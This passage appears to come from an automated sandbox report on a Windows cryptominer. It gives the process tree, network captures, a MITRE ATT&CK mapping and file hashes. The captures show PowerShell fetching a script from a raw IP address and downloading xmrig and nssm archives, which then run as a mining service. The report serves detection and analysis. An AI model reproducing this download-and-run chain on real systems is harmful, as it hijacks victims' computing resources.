- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4708
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4876
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3448
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1752
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5016
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2748
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2208
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3500
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2928
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3536
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2484
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4004
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4044
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2472
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2348
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:380
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3532
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:532
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4704
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:628
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1496
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3168
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2804
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4564
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:436
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3056
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4808
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3716
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3904
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4592
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2184
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4944
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5052
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4868
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5100
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3664
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4736
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1460
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4420
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:736
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1612
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:412
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3524
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1940
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2828
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4708
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4980
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4576
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3340
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2804
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2876

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:3492
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:3968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4136 --field-trial-handle=2744,i,16362475727591565961,3676688664819797550,262144 --variations-seed-version /prefetch:8
1⤵
PID:4172

Network

GET

http://185.254.97.190:2024/test.txt

powershell.exe

Remote address:

185.254.97.190:2024

Request

GET /test.txt HTTP/1.1
Host: 185.254.97.190:2024
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

X-Powered-By: Express
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Mon, 01 Jul 2024 15:30:08 GMT
ETag: W/"3a4b-1906eeaefa5"
Content-Type: text/plain; charset=UTF-8
Content-Length: 14923
Date: Mon, 01 Jul 2024 21:05:47 GMT
Connection: keep-alive
Keep-Alive: timeout=5
DNS

190.97.254.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

190.97.254.185.in-addr.arpa

IN PTR

Response
DNS

raw.githubusercontent.com

powershell.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.109.133

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.108.133
GET

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

powershell.exe

Remote address:

185.199.109.133:443

Request

GET /MoneroOcean/xmrig_setup/master/xmrig.zip HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 3692486
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/zip
ETag: "cb4b18ad6d29e2eb894ed10da4876ab80201079a5b7383bfad9a7a24ee01822e"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 0E0E:34BFB4:1D7DAF:262838:668262AA
Accept-Ranges: bytes
Date: Mon, 01 Jul 2024 21:05:53 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600045-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1719867953.187517,VS0,VE7
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 3884e5184a71eccb9f99789df6a33df785bc62b1
Expires: Mon, 01 Jul 2024 21:10:53 GMT
Source-Age: 210
DNS

133.109.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.109.199.185.in-addr.arpa

IN PTR

Response

133.109.199.185.in-addr.arpa

IN PTR

cdn-185-199-109-133githubcom
DNS

58.55.71.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

58.55.71.13.in-addr.arpa

IN PTR

Response
DNS

80.90.14.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.90.14.23.in-addr.arpa

IN PTR

Response

80.90.14.23.in-addr.arpa

IN PTR

a23-14-90-80deploystaticakamaitechnologiescom
DNS

19.177.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.177.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
GET

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

powershell.exe

Remote address:

185.199.109.133:443

Request

GET /MoneroOcean/xmrig_setup/master/nssm.zip HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 138273
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/zip
ETag: "516060408d755298a7c2d5a55ef8816a492c342ce156e91f5893df4d25424a91"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 9699:3480C2:1E9727:27C49F:668262B1
Accept-Ranges: bytes
Date: Mon, 01 Jul 2024 21:06:08 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600063-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1719867969.616916,VS0,VE2
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: ab0b485b453f9638385f667901f1cfc5da41087e
Expires: Mon, 01 Jul 2024 21:11:08 GMT
Source-Age: 223
DNS

232.168.11.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.168.11.51.in-addr.arpa

IN PTR

Response
DNS

26.165.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.165.165.52.in-addr.arpa

IN PTR

Response
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR

Response
DNS

31.121.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.121.18.2.in-addr.arpa

IN PTR

Response

31.121.18.2.in-addr.arpa

IN PTR

a2-18-121-31deploystaticakamaitechnologiescom
DNS

154.239.44.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

154.239.44.20.in-addr.arpa

IN PTR

Response
DNS

97.17.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.17.167.52.in-addr.arpa

IN PTR

Response
DNS

43.56.20.217.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.56.20.217.in-addr.arpa

IN PTR

Response
DNS

28.73.42.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.73.42.20.in-addr.arpa

IN PTR

Response

172.217.169.74:443

46 B
40 B
1
1
185.254.97.190:2024

http://185.254.97.190:2024/test.txt

http

powershell.exe

583 B
15.8kB
11
14

HTTP Request

GET http://185.254.97.190:2024/test.txt

HTTP Response

200
185.199.109.133:443

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

tls, http

powershell.exe

89.4kB
3.8MB
1723
2742

HTTP Request

GET https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

HTTP Response

200
13.107.253.64:443

46 B
40 B
1
1
185.199.109.133:443

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

tls, http

powershell.exe

3.1kB
147.7kB
59
112

HTTP Request

GET https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

HTTP Response

200

8.8.8.8:53

190.97.254.185.in-addr.arpa

dns

73 B
145 B
1
1

DNS Request

190.97.254.185.in-addr.arpa
8.8.8.8:53

raw.githubusercontent.com

dns

powershell.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.109.133

185.199.110.133

185.199.111.133

185.199.108.133
8.8.8.8:53

133.109.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.109.199.185.in-addr.arpa
8.8.8.8:53

58.55.71.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

58.55.71.13.in-addr.arpa
8.8.8.8:53

80.90.14.23.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

80.90.14.23.in-addr.arpa
8.8.8.8:53

19.177.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

19.177.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

232.168.11.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

232.168.11.51.in-addr.arpa
8.8.8.8:53

26.165.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

26.165.165.52.in-addr.arpa
8.8.8.8:53

171.39.242.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

171.39.242.20.in-addr.arpa
8.8.8.8:53

31.121.18.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

31.121.18.2.in-addr.arpa
8.8.8.8:53

154.239.44.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

154.239.44.20.in-addr.arpa
8.8.8.8:53

97.17.167.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

97.17.167.52.in-addr.arpa
8.8.8.8:53

43.56.20.217.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

43.56.20.217.in-addr.arpa
8.8.8.8:53

28.73.42.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

28.73.42.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5b5352c55a8e79ac8de4be3202d496a1

SHA1
4a263d9e36e5ef972e4b19035cae169e1df6459c

SHA256
eff52a77e2fd653199c31162fbd5557a83995ef0e6e0570bf6495d1b5386b3b8

SHA512
c4e5e245c427bc6f9cc95ae80efbd46fd432bea5a4f9366332b1850d833316e6f4eab0e25259b2ea39c40724dcae91ba748234cb1a3cf95b38d8fed162741d63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8965b4c4d025adfe0186534fc310727f

SHA1
e8196c275bbc54337289806b535efc4f5bec00b0

SHA256
973c7abc0161b79565eb5bcebf12b5e9e19625b158ea08ccfcc989f845463a5e

SHA512
bde1bee8fe01704b597918be35a34d141fc47654019661bfc3f77641d193fbaab5b87c9eb635f8af85b3f2d5360996a2bdcf99f6967281d64c5e28bf9892b4d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bd0ed163d33172e9c197c07447ab0bd7

SHA1
3533e3a11bde112cfad3062bfa155f19a3eeb266

SHA256
268db4fd9e6a71c4f1b7423128fd010d85225c828876f03e77afa2747e8a73dd

SHA512
7dd20cac74dc369ffe92ef5d7a696af531332b3792d2a9924756b22cd3e12a37257d1e2951271d2a4bd793e66a1ef907b3c56645d5f8eecc6d754b1d6dd72900

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
948077afc583ed76667c4503f9e8dd7a

SHA1
a713d5c6d2e905a2316a93396963877e16f65191

SHA256
2536ddf1910b9ca6bf607e8384b2bd5ed35e2990a7cbc9ae2d6f199b5ac7aee3

SHA512
9cf145200671cb4ffd20c1a60d3b1233383bf970ba6cf0c6b922cc0483b75b785055f84ed0067808abfb64c3a59762ca7bf66638195d90890108a68721319211

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bea2568bb1d2f27c25251de29653cc0f

SHA1
ff993d2e0e91bfc5754ed0e2576f6fe2ce37d455

SHA256
7e50fa03d556b3c95ddd2a5243e8504736bdef0222ad37d176cb710af4dffe90

SHA512
379d3d08a2c7086a774857886b144ec2509e1c4efc1ae744c1b76dd9acbc87f34371e0697adcc8fcfc4e57adc314fd223feed51537c6722f787f4db7ba87b891

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
436a8ffe62732538dc4be4b84987527e

SHA1
47ef91df1f059a5b2a99ddbff7935c3bc272bdd9

SHA256
4c8cc423fc77cf7ad49634003d9daee11af744a398e42b17ec5a6e44092d976e

SHA512
aed5b350fcb83f9e89cc2a103198c03df9bb1d1e689165861dea1a96425973dadc9982e3a9738152f1fbac7f078dee6909e11cafba226f82c87b6fa301bdc43f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c15d644efea59d417cc06875bcbcdc6d

SHA1
1abec92b2cc7cdffd355c86cdfb4c705ebbfe893

SHA256
bb366a200e5bc1c21a88bffc195d8754969cd074b4b3657c87de9f4e618120cf

SHA512
c276b1e6132b217efd57c94fcf740f5f14dc84b829b150a463046cc82a350497f0033fd5f018ba2f171dd24380497692958fc01f49b1b56517f50d955a1e2d57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4d9d245058609d83f6256f0ee87930cb

SHA1
5e0f37247a8db6c07db14595269f5a1d227a95df

SHA256
2d64bd1b0e306594a1fbd5c72145c9dddcf2265f7bb353f296c2911d91c7131c

SHA512
fe73ed1b788f88f0efc9e346223f3639bd7ba2b079f12a51676e975e55486cecd15fe09b2c86b4446c6621bb96058385cac2a34a96a578d1174f1e372684402f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c20ac38ae3022e305b8752804aadf486

SHA1
4c144d6cfafb5c37ab4810ff3c1744df81493cdb

SHA256
03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf

SHA512
c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b203c3100e450a7ffaa83dbafe1cf28d

SHA1
2d31984c7c0c080ca647317da99b1261d15399a4

SHA256
35aa1c69f8d110dbda2fbb9f7b84b377166f6f3fee170a0f08f108102d8fc0f7

SHA512
bab42d68496f600d54ad825e1fb3392e709a2468905be19fd071707e52c56f3c45b670359a85116f7bb6f57c816cbd6282161859010dd573dede97788f4e1a39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
820205d39465951c5c42b34cbc92f04f

SHA1
88b094a2e2afc8436e5ade7099e1ec43a76e0721

SHA256
f9770cf0e5dfe76e08178899a1bd210333e2387cdff744791b3676d271b5dd6c

SHA512
956a976389c8660a13f7184404671eed9891f45d00e730d841076f2f780f364b3ea79d38cdd623a3fb9314585ace6c4da01a3e6077a6695844407d0d1da2633e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
52bf9d9a16992d287379501ef216818e

SHA1
917801b9de876bcee9e1ffe4d536b4ac9c726993

SHA256
046e6a5c3e69f8af30387182375919d7f4b7c40d815f0eaa71fc5eee5aeb8862

SHA512
0a0b64de2bc3ab2f6e4e573782f89baaf0e74f43e67508dab267ad4e866f704e9e159bc693e01ffbcb816f69328fa58eed1187bb294e2c1155aeb4d717569b0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vwuyfpal.lob.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp1B05.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
725d38d9eeadc9c2691063936b01f9ec

SHA1
153fd5bd55cfd845516562291a7ab867d68145b5

SHA256
0df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43

SHA512
fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
64cafb884608c751a2bccaca7c582e0f

SHA1
924f71ecb4903ab63a13a125e62fd6e5f5d20cb2

SHA256
3250e852f2fb3e61bd0642d92f1decac666777da7c4d59d6270ee49fc856151b

SHA512
ddd68d3d13bd65f926f6be67ac891c143d6e282ee955871382452f2627ca42ed54e7363d83651b904cdf8054bc1d12a02becd44ac1b5cdc98ac42fc7ebfe97a0

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
993bb26789d07c6ba3d0483e1697f66b

SHA1
9ccb7876dc4ddb65b2aba03737bc708f231704d5

SHA256
be170c95c392fec2dda13b4f6710cac7e9f2cf1b59d5e0ea9e3ab1906453025b

SHA512
753c77dbcea361b403abd05bd594af8c924b246960b8e9375dcc51d75d47abf08af37eefa2ea3139301cf97c5cd27c71834155f53f00565495f78f01c006dc5a

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
71469039aeadb148b9be6bef59efea0e

SHA1
368aae717236f31850399ff06a973dc7e6dafedf

SHA256
a959d78ed05393b0ee462c47573deb247d69a495e5fb2eb7991c99d60b48bac2

SHA512
fd242b21996fb01f62cd6d23cd899b39890528918cd8fd145c82a4af4069b0278e601536ccecbf9d077a1c6e680a1cad416067878a72a06ea50a6546375f56f9

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
